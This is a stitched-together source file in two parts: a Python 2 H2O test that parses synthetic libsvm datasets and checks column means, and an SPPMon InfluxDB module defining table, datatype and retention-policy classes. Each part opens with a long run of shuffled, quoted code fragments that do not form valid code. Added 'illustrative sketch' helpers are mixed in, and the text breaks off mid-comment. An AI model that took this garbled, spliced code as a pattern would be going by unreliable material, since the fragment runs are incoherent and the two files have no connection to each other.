test_many_fp_formats_libsvm_2(self): # h2b.browseTheCloud() SYNDATASETS_DIR =", "the number of cols self.assertTrue(k>=0 and k<len(colResultList)) compare = colResultList[k]", "should use this exprList = [ 'Result<n> = sum(<keyX>[<col1>])', ]", "return (colNumberMax, synColSumDict) class Basic(unittest.TestCase): def tearDown(self): h2o.check_sandbox_for_errors() @classmethod def", "str(sel) print \"This dataset requires telling h2o parse it's a", "the output data go? 
(col 0) colNumber = random.randint(1, colCount)", "random\", csvPathname # dict of col sums for comparison to", "# figures out everything from parseResult['destination_key'] # needs y to", "exprList = [ 'Result<n> = sum(<keyX>[<col1>])', ] DO_SUMMARY = False", "SEEDPERFILE, sel, distribution) selKey2 = hex_key + \"_\" + str(sel)", "rows, parsed to %s rows\" % (rowCount, num_rows)) # need", "DO_COMPARE_SUM: h2e.exec_zero_list(zeroList) colResultList = h2e.exec_expr_list_across_cols(None, exprList, selKey2, maxCol=colNumberMax+1, timeoutSecs=timeoutSecs) print", "else: # some number of values per row.. 50% or", "equal to generated mean %0.6f' % (k, mean, synMean)) num_missing_values", "sum is not equal to expected %0.6f' % (v, compare))", "DO_COMPARE_SUM = False def write_syn_dataset(csvPathname, rowCount, colCount, SEEDPERFILE, sel, distribution):", "if val and (colNumber > colNumberMax): colNumberMax = colNumber #", "will be there ## val = r.uniform(MIN,MAX) val = r.triangular(valMin,valMax,0)", "a libsvm..doesn't detect automatically\" parseResult = h2i.import_parse(path=csvPathname, schema='put', hex_key=selKey2, timeoutSecs=timeoutSecs,", "add a val? if val and (colNumber > colNumberMax): colNumberMax", "h2o_hosts, h2o_browse as h2b, h2o_import as h2i, h2o_exec as h2e,", "with the firs tone goodX = h2o_glm.goodXFromColumnInfo(y=0, key=parseResult['destination_key'], timeoutSecs=300, noPrint=True)", "as h2b, h2o_import as h2i, h2o_exec as h2e, h2o_glm import", "## val = r.uniform(MIN,MAX) val = r.triangular(valMin,valMax,0) valFormatted = h2o_util.fp_format(val,", "num_missing_values = inspect['cols'][k]['num_missing_values'] self.assertEqual(0, num_missing_values, msg='col %s num_missing_values %d should", "though we're comparing floating point sums, the operations probably should", "should be integers that match the number of cols self.assertTrue(k>=0", "only one value per row! # is it okay to", "random integer for class val = random.randint(classMin,classMax) rowData.insert(0, val) synColSumDict[0]", "integers that match the number of cols self.assertTrue(k>=0 and k<len(colResultList))", "non-zero # space is the only valid separator # add", "colNumber = random.randint(1, colCount) val = addRandValToRowStuff(colNumber, valMin, valMax, rowData,", "h2b.browseTheCloud() SYNDATASETS_DIR = h2o.make_syn_dir() tryList = [ (100, 10000, 'cA',", "valMax = 1e2 classMin = -36 classMax = 36 dsf", "be integers that match the number of cols self.assertTrue(k>=0 and", "# gives us some reporting on missing values, constant values,", "# even though we try to get a max colCount", "SEED = h2o.setup_random_seed() localhost = h2o.decide_if_localhost() if (localhost): h2o.build_cloud(2,java_heap_GB=5) else:", "= hex_key + \"_\" + str(sel) print \"This dataset requires", "this range. so we don't print zeroes for svm! if", "(including output). 
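# --- illustrative sketch (added; not part of the original test) ----------------
# write_syn_dataset() above emits SVMLight/libsvm rows: an integer class label in
# col 0, then space-separated <col>:<value> pairs for every column whose
# triangular draw escapes the suppression window (|val| >= valMax/2 == 50).
# A minimal, hypothetical generator for a single such row, mirroring that logic:
def _example_libsvm_row(seed=42, colCount=5):
    r = random.Random(seed)
    rowData = []
    for colNumber in range(1, colCount+1):
        val = r.triangular(-1e2, 1e2, 0)
        # mirror the zero-suppression: values near 0 are dropped entirely,
        # so sparse rows never contain explicit zeroes
        if not (-50 < val < 50):
            rowData.append("%s:%s" % (colNumber, val))
    rowData.insert(0, r.randint(-36, 36)) # output class goes in col 0
    return " ".join(map(str, rowData)) # shaped like "7 2:93.2 5:-61.0"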
class Basic(unittest.TestCase):
    def tearDown(self):
        h2o.check_sandbox_for_errors()

    @classmethod
    def setUpClass(cls):
        global SEED, localhost
        SEED = h2o.setup_random_seed()
        localhost = h2o.decide_if_localhost()
        if (localhost):
            h2o.build_cloud(2, java_heap_GB=5)
        else:
            h2o_hosts.build_cloud_with_hosts()

    @classmethod
    def tearDownClass(cls):
        h2o.tear_down_cloud()

    def test_many_fp_formats_libsvm_2(self):
        # h2b.browseTheCloud()
        SYNDATASETS_DIR = h2o.make_syn_dir()
        tryList = [
            (100, 10000, 'cA', 300, 'sparse50'),
            (100, 10000, 'cB', 300, 'sparse'),
            # (100, 40000, 'cC', 300, 'sparse50'),
            # (100, 40000, 'cD', 300, 'sparse'),
        ]

        for (rowCount, colCount, hex_key, timeoutSecs, distribution) in tryList:
            NUM_CASES = h2o_util.fp_format()
            for sel in [random.randint(0, NUM_CASES-1)]: # len(caseList)
                SEEDPERFILE = random.randint(0, sys.maxint)
                csvFilename = "syn_%s_%s_%s_%s.csv" % (SEEDPERFILE, sel, rowCount, colCount)
                csvPathname = SYNDATASETS_DIR + '/' + csvFilename

                print "Creating random", csvPathname
                # dict of col sums for comparison to exec col sums below
                (colNumberMax, synColSumDict) = write_syn_dataset(csvPathname, rowCount, colCount, SEEDPERFILE, sel, distribution)

                selKey2 = hex_key + "_" + str(sel)
                print "This dataset requires telling h2o parse it's a libsvm..doesn't detect automatically"
                parseResult = h2i.import_parse(path=csvPathname, schema='put', hex_key=selKey2,
                    timeoutSecs=timeoutSecs, doSummary=False, parser_type='SVMLight')
                print csvFilename, 'parse time:', parseResult['response']['time']
                print "Parse result['destination_key']:", parseResult['destination_key']
                inspect = h2o_cmd.runInspect(None, parseResult['destination_key'],
                    max_column_display=colNumberMax+1, timeoutSecs=timeoutSecs)
                num_cols = inspect['num_cols']
                num_rows = inspect['num_rows']
                print "\n" + csvFilename

                # SUMMARY****************************************
                # gives us some reporting on missing values, constant values,
                # to see if we have x specified well
                # figures out everything from parseResult['destination_key']
                # needs y to avoid output column (which can be index or name)
                # assume all the configs have the same y..just check with the first one
                goodX = h2o_glm.goodXFromColumnInfo(y=0, key=parseResult['destination_key'],
                    timeoutSecs=300, noPrint=True)

                if DO_SUMMARY:
                    summaryResult = h2o_cmd.runSummary(key=selKey2, max_column_display=colNumberMax+1, timeoutSecs=timeoutSecs)
                    h2o_cmd.infoFromSummary(summaryResult, noPrint=True)

                self.assertEqual(colNumberMax+1, num_cols,
                    msg="generated %s cols (including output). parsed to %s cols" % (colNumberMax+1, num_cols))

                # Exec (column sums)*************************************************
                if DO_COMPARE_SUM:
                    h2e.exec_zero_list(zeroList)
                    colResultList = h2e.exec_expr_list_across_cols(None, exprList, selKey2,
                        maxCol=colNumberMax+1, timeoutSecs=timeoutSecs)
                    print "\n*************"
                    print "colResultList", colResultList
                    print "*************"

                self.assertEqual(rowCount, num_rows,
                    msg="generated %s rows, parsed to %s rows" % (rowCount, num_rows))

                # FIX! need to fix this for compare to expected:
                # we should be able to keep the list of fp sums per col above,
                # since we generate the dataset
                ### print "\nsynColSumDict:", synColSumDict

                for k, v in synColSumDict.iteritems():
                    if DO_COMPARE_SUM:
                        # k should be integers that match the number of cols
                        self.assertTrue(k >= 0 and k < len(colResultList))
                        compare = colResultList[k]
                        print "\nComparing col sums:", v, compare
                        # Even though we're comparing floating point sums, the operations probably should have
                        # been done in same order, so maybe the comparison can be exact (or not!)
                        self.assertAlmostEqual(v, compare, places=0,
                            msg='%0.6f col sum is not equal to expected %0.6f' % (v, compare))

                    synMean = (v + 0.0) / rowCount
                    # enums don't have a mean, but we're not enums
                    mean = float(inspect['cols'][k]['mean'])
                    # our fp formats in the syn generation sometimes only have two places?
                    self.assertAlmostEqual(mean, synMean, places=0,
                        msg='col %s mean %0.6f is not equal to generated mean %0.6f' % (k, mean, synMean))

                    num_missing_values = inspect['cols'][k]['num_missing_values']
                    self.assertEqual(0, num_missing_values,
                        msg='col %s num_missing_values %d should be 0' % (k, num_missing_values))

if __name__ == '__main__':
    h2o.unit_main()
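# --- illustrative sketch (added; not part of the original test) ----------------
# The per-column check above compares h2o's parsed mean against the generator's
# running column sum: synMean = colSum / rowCount, with places=0 so the two means
# only have to agree within ~0.5, tolerating the reduced-precision fp formats
# that h2o_util.fp_format() writes into the csv. A hypothetical equivalent check:
def _example_mean_check(colSum, rowCount, parsedMean):
    synMean = (colSum + 0.0) / rowCount
    # what assertAlmostEqual(..., places=0) enforces
    return round(abs(parsedMean - synMean), 0) == 0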
<filename>python/influx/database_tables.py
"""Provides all database and table structures used for the influx database.

Classes:
    Datatype
    Database
    Table
    RetentionPolicy
"""
from __future__ import annotations
from enum import Enum, unique
import re
import json
from typing import Any, Dict, List, Set, Tuple, Union

import influx.influx_queries as Queries
from utils.execption_utils import ExceptionUtils
from utils.influx_utils import InfluxUtils
from utils.spp_utils import SppUtils


@unique
class Datatype(Enum):
    """This enum differentiates between the different Influx datatypes.
    SPPMon will automatically insert the data in the right format.
    The order of the types within the enum is important: bool is a int, but a int is not a bool.
    Important: only use `TIME` for epoch timestamps, *NOT* for durations or counters;
    `TIME` is automatically converted into second format.
    Note: The return type is just a helper and not of a big use.

    Methods:
        get_auto_datatype - get Datatype enum by value type analysis
    """
    NONE = type(None)
    BOOL = bool
    """Checked before INT since it is a subtype of int. TODO Untested, saves as Boolean within Influx."""
    INT = int
    """Appends a 'i' at end of number to declare. Fails if the data is mixed with any other type."""
    FLOAT = float
    """Unchanged value. Default Influx numeric datatype."""
    STRING = str
    TIMESTAMP = object
    """Automatically converted into seconds. Important: Only use for Epoch timestamps, not duration or counter.
    Caution: Type is just a placeholder, do not set to int - causing problems!"""

    @staticmethod
    def get_auto_datatype(value: Any) -> Datatype:
        """get Datatype enum by value type analysis. Usage should be avoided.
        Only use if no datatype is declared. It skips time-type and fails if ints are mixed with floats.
        If no type is detected emits a warning and returns `NONE`.

        Arguments:
            value {Union[str, float, int, bool, None]} -- Value to be analyzed

        Returns:
            Datatype -- type of value or `NONE`.
        """
        for enum in Datatype:
            if(enum is Datatype.TIMESTAMP):
                continue
            if(isinstance(value, enum.value)):
                return enum
        ExceptionUtils.error_message(f"No auto type found for {value}")
        return Datatype.NONE


class RetentionPolicy:
    """Represents an influxdb retention policy. By this policy it is declared after
    which amount of time a dataset is deleted from the DB.

    Attributes
        name - name of the RP
        database - associated database
        duration - time until the data is purged
        replication - how often the data is replicated
        shard_duration - size of memory-groups
        default - whether this is the default RP

    Methods
        to_dict - creates a dict out of the values
    """

    @property
    def name(self) -> str:
        """name of the Retention Policy"""
        return self.__name

    @property
    def database(self) -> Database:
        """associated database"""
        return self.__database

    @property
    def duration(self) -> str:
        """time until the data is purged"""
        return self.__duration

    @property
    def replication(self) -> int:
        """How often the data is replicated. We only have 1 db instance so replication is always 1"""
        return self.__replication

    @property
    def shard_duration(self) -> str:
        """Size of memory-groups. Default time is 0s, then the db decides what to take"""
        return self.__shard_duration

    @property
    def default(self) -> bool:
        """whether this is the default RP"""
        return self.__default

    def __init__(self, name: str, database: Database, duration: str,
                 replication: int = 1, shard_duration: str = "0s", default: bool = False) -> None:
        if(not name):
            raise ValueError("need retention policy name for creation")
        if(not database):
            raise ValueError("need retention policy database for creation")
        if(not duration):
            raise ValueError("need retention policy duration for creation")
        if(not replication):
            raise ValueError("need retention policy replication factor for creation")
        if(not shard_duration):
            raise ValueError("need retention policy shard duration for creation")
        if(default is None):
            raise ValueError("need retention policy default setting for creation")

        self.__name = name
        self.__database = database
        self.__replication = replication
        self.__default = default
        try: # str due usage of method
            self.__duration: str = InfluxUtils.transform_time_literal(duration, single_vals=False)
        except ValueError as error:
            ExceptionUtils.exception_info(error)
            raise ValueError(f"duration for retention policy {name} is not in the correct time format")
        try: # str due usage of method
            self.__shard_duration: str = InfluxUtils.transform_time_literal(shard_duration, single_vals=False)
        except ValueError as error:
            ExceptionUtils.exception_info(error)
            raise ValueError(f"shard duration for retention policy {name} is not in the correct time format")

    def to_dict(self) -> Dict[str, Union[str, int, bool]]:
        """Used to create a dict out of the values, able to compare to influxdb-created dict"""
        return {
            'name': self.name,
            'duration': self.duration,
            'shardGroupDuration': self.__shard_duration,
            'replicaN': self.__replication,
            'default': self.default
        }

    def __str__(self) -> str:
        return f"{self.database.name}.{self.name}"

    def __repr__(self) -> str:
        return f"Retention Policy: {self.name}"

    def __eq__(self, o: object) -> bool:
        if(isinstance(o, RetentionPolicy)):
            return o.to_dict() == self.to_dict()
        return False

    def __hash__(self) -> int:
        return hash(json.dumps(self.to_dict(), sort_keys=True))
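# --- illustrative sketch (added; not part of the original module) --------------
# get_auto_datatype() walks the enum in declaration order, which is why BOOL is
# declared before INT: isinstance(True, int) is True, but isinstance(5, bool) is
# not. A hypothetical self-check, assuming the member values reconstructed above:
def _datatype_order_sketch() -> None:
    assert Datatype.get_auto_datatype(True) is Datatype.BOOL   # bool caught before int
    assert Datatype.get_auto_datatype(5) is Datatype.INT
    assert Datatype.get_auto_datatype(5.0) is Datatype.FLOAT
    assert Datatype.get_auto_datatype("5") is Datatype.STRING
    assert Datatype.get_auto_datatype(None) is Datatype.NONE   # NONE = type(None)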
class Table:
    """Represents a measurement in influx. Contains pre-defined tag and field definitions.

    Attributes
        name - name of the table
        fields - dict of field name with datatype
        tags - tags as list of str
        time_key - key name of the timestamp field
        retention_policy - retention policy associated with this table
        database - table is declared within this database

    Methods
        split_by_table_def - Split the given dict into a pre-defined set of tags, fields and a timestamp.
    """

    @property
    def fields(self) -> Dict[str, Datatype]:
        """fields of the table, name is key, value is datatype"""
        return self.__fields

    @property
    def tags(self) -> List[str]:
        """tags of the table, datatype always string"""
        return self.__tags

    @property
    def time_key(self) -> str:
        """name of the timestamp key"""
        return self.__time_key

    @property
    def name(self) -> str:
        """name of the table"""
        return self.__name

    @property
    def retention_policy(self) -> RetentionPolicy:
        """retention policy associated with this table"""
        return self.__retention_policy

    @property
    def database(self) -> Database:
        """table is declared within this database"""
        return self.__database

    __bad_measurement_characters: List[str] = [' ', ',']
    """those chars need to be escaped within a measurement/table name"""

    def __init__(self, database: Database, name: str, fields: Dict[str, Datatype] = None,
                 tags: List[str] = None, time_key: str = 'time',
                 retention_policy: RetentionPolicy = None) -> None:
        if(not database):
            raise ValueError("need database to create table")
        if(not name):
            raise ValueError("need str name to create table")
        if(not time_key):
            raise ValueError("time key cannot be None")

        if(not fields):
            fields = {}
        if(not tags):
            tags = []
        if(not retention_policy):
            retention_policy = next(filter(lambda rp: rp.default, database.retention_policies))

        self.__database: Database = database
        self.__fields: Dict[str, Datatype] = fields
        self.__tags: List[str] = tags
        self.__time_key: str = time_key
        self.__retention_policy = retention_policy

        # escape not allowed characters in Measurement
        for bad_character in self.__bad_measurement_characters:
            if(re.search(bad_character, name)):
                name = name.replace(bad_character, '\\%c' % bad_character)
        self.__name: str = name

    def __str__(self) -> str:
        return f"{self.database.name}.{self.retention_policy.name}.{self.name}"

    def __repr__(self) -> str:
        return f"Table: {self.name}"

    def split_by_table_def(self, mydict: Dict[str, Any]) -> Tuple[Dict[str, Any], Dict[str, Any], Union[str, int]]:
        """Split the given dict into a pre-defined set of tags, fields and a timestamp.

        None-Values and empty strings are ignored. If there are no fields declared,
        it will split by a default pattern. Undeclared columns will produce a warning.
        This function uses the tag/field and timestamp definition declared within this table.

        Arguments:
            self {Table} -- Table with predefined set of tags and fields
            mydict {Dict[str, Any]} -- dict with columns as keys. None-Values are ignored

        Raises:
            ValueError: If no dict is given or not of type dict.

        Returns:
            (Dict[str, Any], Dict[str, Any], int) -- Tuple of: tags, fields, timestamp
        """
        if(not mydict):
            raise ValueError("need at least one value in dict to split")

        # if table is not defined use default split
        if(not self.fields):
            return InfluxUtils.default_split(mydict=mydict)

        # fill dicts
        # table.fields is a dict, we only need the keys
        fields: Dict[str, Any] = dict.fromkeys(self.fields.keys(), None)
        tags: Dict[str, Any] = dict.fromkeys(self.tags, None)

        # what field should be recorded as time
        time_stamp_field = self.time_key
        # helper variable to only overwrite if it is not the time_stamp_field
        time_overwrite_allowed = True
        # actual timestamp saved
        time_stamp: Union[str, int, None] = None

        for (key, value) in mydict.items():

            # Ignore empty entries
            if(value is None or (isinstance(value, str) and not value)):
                continue

            # Check timestamp value if it matches any of the predefined time key names;
            # regular keys fall through to the field/tag check below.
            if(key not in InfluxUtils.time_key_names and key is not time_stamp_field):
                pass
            # time_stamp_field of table is highest priority. Do not overwrite it.
            elif(key is time_stamp_field):
                time_overwrite_allowed: bool = False
                time_stamp = value
            # if time_stamp_field is not used yet, overwrite sppmonCaptureTime or others
            elif(time_overwrite_allowed):
                time_stamp = value
            # if no overwrite allowed, continue and drop field
            else:
                continue

            # Otherwise check for Keys or Fields
            if(key in fields):
                fields[key] = value
            elif(key in tags):
                tags[key] = value
            elif(key in InfluxUtils.time_key_names or key in time_stamp_field):
                continue
            else:
                ExceptionUtils.error_message(f"Not all columns for table {self.name} are declared: {key}")
                # before: key+"MISSING" : Removed to avoid death-circle on repeated queries.
                fields[key] = value

        return (tags, fields, time_stamp)
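# --- illustrative sketch (added; not part of the original module) --------------
# Table.__init__ escapes the blanks and commas listed in
# __bad_measurement_characters, since influx measurement names may not contain
# them unescaped. A hypothetical standalone equivalent of that loop:
def _escape_measurement_sketch(name: str) -> str:
    for bad_character in [' ', ',']:
        if(re.search(bad_character, name)):
            name = name.replace(bad_character, '\\%c' % bad_character)
    return name  # e.g. "vm stats" -> "vm\ stats"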
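# --- Editor's sketch (not part of the original module): RetentionPolicy
# validates its time literals on construction, so a malformed duration is
# assumed to surface as a ValueError from InfluxUtils.transform_time_literal.
def _demo_retention_policy_validation(database: Database) -> None:
    try:
        RetentionPolicy(name="bad", database=database, duration="ninety days")
    except ValueError as error:
        print(f"rejected: {error}")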
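# --- Editor's sketch (not part of the original module): why the member order
# of Datatype matters for get_auto_datatype. isinstance(True, int) is True in
# Python, so BOOL must be tested before INT; TIMESTAMP is skipped entirely
# and has to be declared explicitly in a table definition.
def _demo_get_auto_datatype() -> None:
    assert Datatype.get_auto_datatype(True) is Datatype.BOOL      # not INT
    assert Datatype.get_auto_datatype(42) is Datatype.INT
    assert Datatype.get_auto_datatype(3.14) is Datatype.FLOAT
    assert Datatype.get_auto_datatype("abc") is Datatype.STRING
    assert Datatype.get_auto_datatype(None) is Datatype.NONE      # NONE placeholder matches
    assert Datatype.get_auto_datatype([1, 2]) is Datatype.NONE    # unmatched: warns, then NONE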
\"\"\" for enum in Datatype:", "self.__fields: Dict[str, Datatype] = fields self.__tags: List[str] = tags self.__time_key:", "\"\"\"get Datatype enum by value typ analysis. Usage should be", "associated with this table database - table is declared within", "Default Influx numeric data type. Mixing with ints works.\"\"\" TIMESTAMP", "the database tables - tables with predefined tags & fields", "except ValueError as error: ExceptionUtils.exception_info(error) raise ValueError(f\"duration for retention policy", "to split\") # if table is not defined use default", "table fields - dict of field name with datatype tags", "Union[str, int, None]]: \"\"\"Split the given dict into a pre-defined", "the tables via name. Creates empty table if missing. \"\"\"", "Policies continuous_queries - Set of all provided Continuous Queries Methods", "to compare to influxdb-created dict\"\"\" return { 'name': self.name, 'duration':", "Datatype] = None, tags: List[str] = None, time_key: str =", "Boolean within Influx. \"\"\" INT = int \"\"\"Appends a 'i'", "not the time_stamp_field time_overwrite_allowed = True # actualy timestamp saved", "bool: \"\"\" whether this is the default RP\"\"\" return self.__default", "memory-groups default - whether this is the default RP Methods", "\"\"\"Used to create a dict out of the values, able", "timestamp into seconds. Important: Only use for Epoch timestamps, not", "skips time-type and fails if ints are mixed with floats.", "return InfluxUtils.default_split(mydict=mydict) # fill dicts # table.fields is a dict,", "to take\"\"\" return self.__shard_duration @property def default(self) -> bool: \"\"\"", "fields): fields = {} if(not tags): tags = [] if(not", "get_auto_datatype(value: Any) -> Datatype: \"\"\"get Datatype enum by value typ", "class Datatype(Enum): \"\"\" This enum differentiates between the different Influx-Types.", "str = 'time', retention_policy: RetentionPolicy = None) -> None: if(not", "= value elif(key in InfluxUtils.time_key_names or key in time_stamp_field): continue", "of all provided Retention Policies\"\"\" return self.__retention_policies @property def continuous_queries(self)", "default: bool = False) -> None: if(not name): raise ValueError(\"need", "able to compare to influxdb-created dict\"\"\" return { 'name': self.name,", "also used as reference\"\"\" return self.__name def __getitem__(self, table_name: str)", "Dict[str, Datatype]: \"\"\"fields of the table, name is key, value", "-> bool: \"\"\" whether this is the default RP\"\"\" return", "Methods to_dict - creates a dict out of the values", "__str__(self) -> str: return f\"{self.database.name}.{self.retention_policy.name}.{self.name}\" def __repr__(self) -> str: return", "Tuple of: tags, fields, timestamp \"\"\" if(not mydict): raise ValueError(\"need", "from typing import Any, Dict, List, Set, Tuple, Union import", "ignored Raises: ValueError: If no dict is given or not", "RetentionPolicy)): return o.to_dict() == self.to_dict() return False def __hash__(self) ->", "`TIME` is automatically converted into second format. 


class RetentionPolicy:
    """Represents an influxdb retention policy. By this policy it is declared
    after which amount of time a dataset is deleted from the DB.

    Attributes
        name - name of RP
        database - associated database
        duration - time until the data is purged
        replication - how often the data is replicated
        shard_duration - size of memory-groups
        default - whether this is the default RP

    Methods
        to_dict - creates a dict out of the values
    """

    @property
    def name(self) -> str:
        """name of the Retention Policy"""
        return self.__name

    @property
    def database(self) -> Database:
        """associated database"""
        return self.__database

    @property
    def duration(self) -> str:
        """time until the data is purged"""
        return self.__duration

    @property
    def replication(self) -> int:
        """How often the data is replicated. We only have 1 db instance so replication is always 1"""
        return self.__replication

    @property
    def shard_duration(self) -> str:
        """Size of memory-groups. Default time is 0s, then the db decides what to take"""
        return self.__shard_duration

    @property
    def default(self) -> bool:
        """whether this is the default RP"""
        return self.__default

    def __init__(self, name: str, database: Database, duration: str,
                 replication: int = 1, shard_duration: str = "0s",
                 default: bool = False) -> None:
        if(not name):
            raise ValueError("need retention policy name for creation")
        if(not database):
            raise ValueError("need retention policy database for creation")
        if(not duration):
            raise ValueError("need retention policy duration for creation")
        if(not replication):
            raise ValueError("need retention policy replication factor for creation")
        if(not shard_duration):
            raise ValueError("need retention policy shard duration for creation")
        if(default is None):
            raise ValueError("need retention policy default setting for creation")

        self.__name = name
        self.__database = database
        self.__replication = replication
        self.__shard_duration = shard_duration
        self.__default = default
        try:
            # str due usage of method
            self.__duration: str = InfluxUtils.transform_time_literal(duration, single_vals=False)
        except ValueError as error:
            ExceptionUtils.exception_info(error)
            raise ValueError(f"duration for retention policy {name} is not in the correct time format")
        try:
            # str due usage of method
            self.__shard_duration: str = InfluxUtils.transform_time_literal(shard_duration, single_vals=False)
        except ValueError as error:
            ExceptionUtils.exception_info(error)
            raise ValueError(f"shard duration for retention policy {name} is not in the correct time format")

    def to_dict(self) -> Dict[str, Union[str, int, bool]]:
        """Used to create a dict out of the values, able to compare to an influxdb-created dict"""
        return {
            'name': self.name,
            'duration': self.duration,
            'shardGroupDuration': self.__shard_duration,
            'replicaN': self.__replication,
            'default': self.default
        }

    def __str__(self) -> str:
        return f"{self.database.name}.{self.name}"

    def __repr__(self) -> str:
        return f"Retention Policy: {self.name}"

    def __eq__(self, o: object) -> bool:
        if(isinstance(o, RetentionPolicy)):
            return o.to_dict() == self.to_dict()
        return False

    def __hash__(self) -> int:
        return hash(json.dumps(self.to_dict(), sort_keys=True))
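

# --- Illustrative sketch, not part of the original module ----------------
# RetentionPolicy compares and hashes over its to_dict() form, so two policies
# are interchangeable whenever their influxdb-visible settings match. The `db`
# argument is a hypothetical Database instance and the '90d' literal assumes
# InfluxUtils.transform_time_literal accepts it.
def _demo_retention_policy_identity(db: Database) -> None:
    rp_a = RetentionPolicy("autogen", db, "90d", default=True)
    rp_b = RetentionPolicy("autogen", db, "90d", default=True)
    assert rp_a == rp_b            # equal settings -> equal policies
    assert len({rp_a, rp_b}) == 1  # __hash__ agrees with __eq__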


class Table:
    """Represents a measurement in influx. Contains pre-defined tag and field definitions.

    Attributes
        name - name of table
        fields - dict of field name with datatype
        tags - tags as list of str
        time_key - key name of the timestamp field
        retention_policy - retention policy associated with this table
        database - table is declared within this database

    Methods
        split_by_table_def - Split the given dict into a pre-defined set of tags, fields and a timestamp.
    """

    @property
    def fields(self) -> Dict[str, Datatype]:
        """fields of the table, name is key, value is datatype"""
        return self.__fields

    @property
    def tags(self) -> List[str]:
        """tags of the table, datatype always string"""
        return self.__tags

    @property
    def time_key(self) -> str:
        """name of the timestamp key"""
        return self.__time_key

    @property
    def name(self) -> str:
        """name of the table"""
        return self.__name

    @property
    def retention_policy(self) -> RetentionPolicy:
        """retention policy associated with this table"""
        return self.__retention_policy

    @property
    def database(self) -> Database:
        """table is declared within this database"""
        return self.__database

    __bad_measurement_characters: List[str] = [' ', ',']
    """those chars need to be escaped within a measurement/table name"""

    def __init__(self, database: Database, name: str, fields: Dict[str, Datatype] = None,
                 tags: List[str] = None, time_key: str = 'time',
                 retention_policy: RetentionPolicy = None) -> None:
        if(not database):
            raise ValueError("need database to create table")
        if(not name):
            raise ValueError("need str name to create table")
        if(not time_key):
            raise ValueError("time key cannot be None")

        if(not fields):
            fields = {}
        if(not tags):
            tags = []
        if(not retention_policy):
            retention_policy = next(filter(lambda rp: rp.default, database.retention_policies))

        self.__database: Database = database
        self.__fields: Dict[str, Datatype] = fields
        self.__tags: List[str] = tags
        self.__time_key: str = time_key
        self.__retention_policy = retention_policy

        # escape not allowed characters in Measurement
        for bad_character in self.__bad_measurement_characters:
            if(re.search(bad_character, name)):
                name = name.replace(bad_character, '\\%c' % bad_character)
        self.__name: str = name

    def __str__(self) -> str:
        return f"{self.database.name}.{self.retention_policy.name}.{self.name}"

    def __repr__(self) -> str:
        return f"Table: {self.name}"

    def split_by_table_def(self, mydict: Dict[str, Any]) -> Tuple[
            Dict[str, Any], Dict[str, Any], Union[str, int, None]]:
        """Split the given dict into a pre-defined set of tags, fields and a timestamp.

        None-Values and empty strings are ignored. If there are no fields
        declared, it will split by a default pattern. Undeclared columns will
        produce a warning. This function uses the tag/field and timestamp
        definition declared within this table.

        Arguments:
            self {Table} -- Table with a predefined set of tags and fields
            mydict {Dict[str, Any]} -- dict with columns as keys. None-Values are ignored

        Raises:
            ValueError: If no dict is given or not of type dict.

        Returns:
            (Dict[str, Any], Dict[str, Any], int) -- Tuple of: tags, fields, timestamp
        """
        if(not mydict):
            raise ValueError("need at least one value in dict to split")

        # if table is not defined use default split
        if(not self.fields):
            return InfluxUtils.default_split(mydict=mydict)

        # fill dicts
        # table.fields is a dict, we only need the keys
        fields: Dict[str, Any] = dict.fromkeys(self.fields.keys(), None)
        tags: Dict[str, Any] = dict.fromkeys(self.tags, None)

        # what field should be recorded as time
        time_stamp_field = self.time_key
        # helper variable to only overwrite if it is not the time_stamp_field
        time_overwrite_allowed = True
        # actually saved timestamp
        time_stamp: Union[str, int, None] = None

        for (key, value) in mydict.items():

            # Ignore empty entries
            if(value is None or (isinstance(value, str) and not value)):
                continue

            # Check timestamp value if it matches any of the predefined time names
            if(key in time_stamp_field or key in InfluxUtils.time_key_names):

                # sppmonCTS has lowest priority, only set if otherwise None
                if(time_stamp is None and key == SppUtils.capture_time_key):
                    time_stamp = value

                # time_stamp_field is highest priority. Do not overwrite it.
                elif(key is time_stamp_field):
                    time_overwrite_allowed: bool = False
                    time_stamp = value

                # if time_stamp_field is not used yet, overwrite sppmonCaptureTime or others
                elif(time_overwrite_allowed):
                    time_stamp = value

                # if no overwrite allowed, continue and drop field
                else:
                    continue

            # Otherwise check for Keys or Fields
            elif(key in fields):
                fields[key] = value
            elif(key in tags):
                tags[key] = value
            elif(key in InfluxUtils.time_key_names or key in time_stamp_field):
                continue
            else:
                ExceptionUtils.error_message(f"Not all columns for table {self.name} are declared: {key}")
                # before key+"MISSING" : Removed to avoid death-circle on repeated queries.
                fields[key] = value
        return (tags, fields, time_stamp)
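

# --- Illustrative sketch, not part of the original module ----------------
# `split_by_table_def` routes one flat record dict into (tags, fields, time).
# The table is hypothetical; `db` must already carry a default retention
# policy, and the example assumes the record keys do not collide with
# InfluxUtils.time_key_names.
def _demo_split_by_table_def(db: Database) -> None:
    jobs = Table(db, "jobs",
                 fields={"duration": Datatype.INT},
                 tags=["jobName"],
                 time_key="start")
    tags, fields, time_stamp = jobs.split_by_table_def({
        "jobName": "backup",  # declared tag
        "duration": 42,       # declared field
        "start": 1608076800,  # matches time_key -> becomes the timestamp
        "note": None,         # None values are dropped entirely
    })
    assert tags == {"jobName": "backup"}
    assert fields == {"duration": 42}
    assert time_stamp == 1608076800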


class Database:
    """Represents an instance of an influx database. Define all table definitions within the init method.

    Attributes
        name - name of the database
        tables - tables with predefined tags & fields
        retention_policies - Set of all provided Retention Policies
        continuous_queries - Set of all provided Continuous Queries

    Methods
        __getitem__ - [] access on the tables via name. Creates an empty table if missing.
    """

    @property
    def tables(self) -> Dict[str, Table]:
        """Dict with table definitions to look up"""
        return self.__tables

    @property
    def retention_policies(self) -> Set[RetentionPolicy]:
        """Set of all provided Retention Policies"""
        return self.__retention_policies

    @property
    def continuous_queries(self) -> Set[Queries.ContinuousQuery]:
        """Set of all provided Continuous Queries"""
        return self.__continuous_queries

    @property
    def name(self) -> str:
        """name of the database, also used as reference"""
        return self.__name

    def __getitem__(self, table_name: str) -> Table:
        """Acquire an instance of a predefined table, returns an empty table if it was not defined. []-Access.

        Arguments:
            table_name {str} -- name of the table you want to acquire

        Returns:
            Table -- Instance of a predefined table, otherwise a new empty table
        """
        return self.tables.get(table_name, Table(self, table_name))

    def __str__(self) -> str:
        return self.name

    def __repr__(self) -> str:
        return f'Database: {self.name}'

    def __init__(self, name: str):
        self.__name: str = name
        self.__tables: Dict[str, Table] = {}
        self.__retention_policies: Set[RetentionPolicy] = set()
        self.__continuous_queries: Set[Queries.ContinuousQuery] = set()
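

# --- Illustrative sketch, not part of the original module ----------------
# How the pieces fit together: a Database owns retention policies and tables,
# Table.__init__ falls back to the default retention policy, and __getitem__
# hands out an ad-hoc empty table for unknown names. Registering through the
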